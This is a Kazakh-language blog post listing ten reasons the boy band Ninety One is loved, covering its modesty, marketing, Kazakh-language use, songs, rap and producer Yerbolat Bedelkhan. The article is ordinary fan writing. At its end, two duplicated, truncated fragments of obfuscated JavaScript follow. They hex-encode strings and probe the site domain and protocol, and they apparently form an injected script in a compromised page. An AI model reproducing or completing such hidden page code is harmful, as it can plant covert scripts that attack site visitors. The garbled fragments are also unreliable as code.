Ninety One тобын не үшін жақсы көреді: 10 негізгі себеп

Сәлем Қазақстан! Өзімнің блогтарымды көрген адамдар санын көріп, жазуға деген қызығушылығым күннен-күнге артып келеді. Сіздерге көп рахмет! Кеше youtube-тағы 91 тобының видеоларын қарап жігіттерге деген сұраныс өсіп жатқанын байқадым. Тек Қазақстанда емес, басқа елдерде де өз тыңдармандарын тауып жүрген 91 тобы жайлы жазуды жөн көрдім. Бұл өзінің қай тұстарымен және халық не үшін жақсы көретіні туралы 10 негізгі себебін ашып көрсетуге тырысамын.

1. Қарапайымдылық

Гәкку арнасында бірнеше видеоларды қарап, жігіттердің қарапайымдылығы таң қалдырды. Әр қойылған сұраққа, жұлдыз ретінде емес, тыңдармандар деңгейінде жауап беруі ұнады. Бұл көп әншілерге үлгі болатын нәрсе. Себебі біздің әншілерге кішкене танымалдылық болса, көкіректерін көтеріп кетеді. Ал жігіттердің жасы кіші болса да, үлкен ағаларына үлгі болатындай мінез көрсетуде. 

2. Топтың өзгешелігі

Біздің елде мұндай бағытта жұмыс жасайтын топтар болмағасын, халық бұны өзгеше бір дүние ретінде көреді. Бірақ бұл K-POP әлем бойынша танымал бағыттың бірі. Бізде осындай топтың пайда болуынан, халықтың қызығушылығы да арта бастады. Бір жағынан халықта бір сарыннан шаршаған сыңайлы. Сол себепті бұл топтың өзгешелігі өз тыңдармандарын табуда.

3. Музыкалық маркетинг

"Маркетинг не қатысы бар" деп ойлап отырған шығарсыз. Бірақ қазіргі таңда музыка және маркетинг бір-бірінсіз жүре алмайтын егіз баладай болды. Ән айтып жай ғана танымал бола салатын әнші жоқ. Әншіні жан-жақты дамытып, елге тек әншілік қырынан емес, басқа да бір жағынан көрсету қажет. Ninety One тобының тыңдармандармен барлық бағытта жұмыс жасайтыны, өздеріне қарату деп білемін. Тек қана музыкалық арна емес, youtube-тағы жеке каналдары да жақсы жұмыс жасайды. Youtube-тағы каналды дамыту топ үшін үлкен көрсеткіш. Себебі сол канал арқылы басқа елден де өзінің тыңдармандарын табуда. Біздің әншілердің өздеріне канал ашып, жұмыс жасамайтыны ұнамайды. Өздерінің бейнетаспалары әндері әр жерде шашылып жүретіндері де үлкен минус. Ninety One тобының жеке бір маркетлогтары бар ма, жоқ па екенін білмеймін. Бірақ жарнамалау жағынан,  әлеуметтік желілер арқылы дамыту жағынан бұл топқа ешқандай сөз жоқ. Жақында Ринатпен болған бағдарламаға қатысуы да олар үшін жақсы пиар болды. 

4. Қазақ тілді дамытуы

Бұл көп қазақтардың осы топты жақсы көруінің басты себебі десемде болады. Себебі топтың барлық мүшелері қазақ тілін толық меңгерген, таза сөйлейді. Әр кездесуде және бағдардамаларда және тыңдармандар сұрақ қоярда, тек қазақ тілінде жауап береді. Қазақ тілін білмейтін тыңдармандардың үйренуіне осы бір топ себеп болуда. Шайтан дегенше, осы бір жақтарына қуаныңыздар.

5. Киім үлгісі

"Қыздеке" деген әңгімені қойсақ қалай болады, достар! Бұл шоу бизнес, жігіттердің көйлек киіп тұрғанын көрмедім :) Бұл киім үлгісі K-POP бағытының өзіне тән белгісі. Осы киімдер арқылы әншілерді ерекшелендіреді. Дұрыс киіне білуде өнер :) Сондықтан босқа сынай бермей, өзіміздің қазақ жігіттеріне қолдау көрсетейік. 

6. Әндерінің ерекше орындалуы

Жігіттердің сұлулығына қараймыз деп, олардың әндерін ұмытып кетпеңіздер :) Осы әндерінің өзі сезіммен, ерекше айтылады. Соңғы шыққан "Ұмытпа" деген әнін тыңдасаңыздар, ерекше сезіммен, үлкен еңбекпен жазылғанын көресіздер. Әр ән өзінің ерекше ырғағымен, саздылығымен әрбір тыңдарманның жүрегін баурап алады. Қазақ шоу бизнесінде әннің саздылығының жетіспейтінін ескерсек, 91 жігіттерінің әндері осы бір кемшіліктің орынын толықтырып жүргені анық. "Ұмытпа" әнін тыңдаймыз.

7. Тыңдармандармен жұмыс жасауы

Youtube-тағы ресми арнасына кірсеңіз, Ninety One Space деген айдар бар екен. Сол айдарда жігіттер әр апталық блог жүргізеді екен. Сол блог арқылы тыңдармандарға өздерінің күнделікті өмірде болған оқиғаларын көрсетеді. Бұл өте жақсы ойластырылған. Әр тыңдарманға өзінің сүйікті әншісін басқа да қырынан көруге мүмкіндігі болады.

8. Рэп 

Қазір не көп, вайнер, фотограф және рэпер. Кейде қазақ тіліндегі рэпті тыңдап, күлкін келеді.  Рэптің де  өзінің техникалық және тағы да басқа орындаулары бар. Ол жай ғана қара сөз және оқи салу емес. Оны да өзіндік ерекшелік бағытта орындай білу керек. Ninety One тобында осы бағытта оқитын екі орындаушы бар. Әр әнде болған шумақтары, сол әнге әдемі сәйкес келтіріп жасайды. Оқу мәнері техникасы да ерекше. Бұлда тыңдармандарға ұнағаны анық. Әр пікірлерді оқып, оларға "Рэп корольдері" деп жазып қойғанын көрдім. Тыңдаймыз.

9. Қазақылық

Бізде қазақылық деген бар. Оны сөзбен айту маған қиын. Қазақылықты бірден сезесін. Бауырмалдылық, жанашырлық және қарапайымдылық осы бір қазақылықтан табасын. Бұл қазақтардың өзіне тән мінезі десем болады :) Сол қазақылықты жігіттердің бойынан көремін. Сөйлеген сөздері, өзін-өзі ұстауы, қазақ тілді қолдаулары, кішіпейілдігі тыңдармандарға қатты ұнайтыны көрініп тұр. Бұл айтқан сөздерімді қалай қабылдасаңыздарда өздеріңіз біліңіз.

10. Орда тобы (Ерболат Беделхан)

Тыңдармандарды көптеп жинауының бір себебі ол - продюсер. Бұл топтың продюсері белгілі Орла тобының солисті Ерболат Беделхан. Ерболат беделхан туралы үлкен жеке пост арнауға болады. Ол кісіні музыкант ретінде қатты сыйлаймын. Себебі әр шығарған әніне ерекше көзбен қарайтыны, өзін-өзі ұстауы, жанжақтылығы ұнайды. Алдында болған "Айтуға оңай" бағдарламасында білдірген пікірлері шындық. Ол өз бағытының шебері. Осы топқа осындай танымалдылық алып келген Ерболат Беделхан арқасы деп білемін. Бұны тыңдармандар да біледі және жақсы көреді.

Қорытындылай келе, бұл топтың үлкен болашағы бар. Балаларды артқа тарту біздің қанымызда жоқ. Қолдау, дұрыс бағыт-бағдар көрсетейік. Бұл пост ұнаса сасағыңызды жоғары көтеруді ұмытпаңыз.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: